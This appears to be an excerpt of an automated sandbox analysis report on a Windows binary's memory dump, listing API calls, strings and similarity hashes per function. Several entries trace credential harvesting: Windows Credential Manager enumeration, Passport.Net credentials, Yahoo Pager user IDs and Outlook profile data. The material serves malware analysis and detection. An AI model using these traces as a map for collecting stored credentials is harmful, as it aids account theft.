                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                  • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                  • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                  • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                  • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                  • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                  • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                  • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 19018683-0
                                                                                                                  • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                  • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                  • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                  • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040644F
                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                    • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                    • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                    • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 438689982-0
                                                                                                                  • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                  • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                  • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                  • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0044495F
                                                                                                                  • memset.MSVCRT ref: 00444978
                                                                                                                  • memset.MSVCRT ref: 0044498C
                                                                                                                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                  • strlen.MSVCRT ref: 004449A8
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                    • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset$strlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2142929671-0
                                                                                                                  • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                  • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                  • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                  • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                  • strlen.MSVCRT ref: 0040F7BE
                                                                                                                  • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                  • String ID: Passport.Net\*
                                                                                                                  • API String ID: 2329438634-3671122194
                                                                                                                  • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                  • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                  • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                  • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                  • memset.MSVCRT ref: 0040330B
                                                                                                                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                  • strchr.MSVCRT ref: 0040335A
                                                                                                                    • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                  • strlen.MSVCRT ref: 0040339C
                                                                                                                    • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                  • String ID: Personalities
                                                                                                                  • API String ID: 2103853322-4287407858
                                                                                                                  • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                  • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                  • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                  • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00444573
                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValuememset
                                                                                                                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                  • API String ID: 1830152886-1703613266
                                                                                                                  • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                  • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                  • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                  • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?), ref: 00406D87
                                                                                                                  • sprintf.MSVCRT ref: 00406DAF
                                                                                                                  • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastMessagesprintf
                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                  • API String ID: 1670431679-1552265934
                                                                                                                  • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                  • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                  • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                  • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                  • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                  • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                  • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                  • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: H
                                                                                                                  • API String ID: 2221118986-2852464175
                                                                                                                  • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                  • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                  • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                  • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                  • API String ID: 3510742995-3170954634
                                                                                                                  • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                  • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                  • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                  • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                  • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                                                  • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                                                  • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                  • API String ID: 231171946-3708268960
                                                                                                                  • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                  • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                  • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                  • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: winWrite1$winWrite2
                                                                                                                  • API String ID: 438689982-3457389245
                                                                                                                  • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                  • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                  • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                  • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: winRead
                                                                                                                  • API String ID: 1297977491-2759563040
                                                                                                                  • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                  • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                  • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                  • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0044955B
                                                                                                                  • memset.MSVCRT ref: 0044956B
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                  • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                  • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                  • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                  • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                  • memset.MSVCRT ref: 0040AB9C
                                                                                                                    • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                  • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                  • API String ID: 3337535707-2769808009
                                                                                                                  • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                  • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                  • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                  • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 004090C2
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4247780290-0
                                                                                                                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                  APIs
                                                                                                                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                    • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                    • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                    • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                    • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                  • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                                  • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
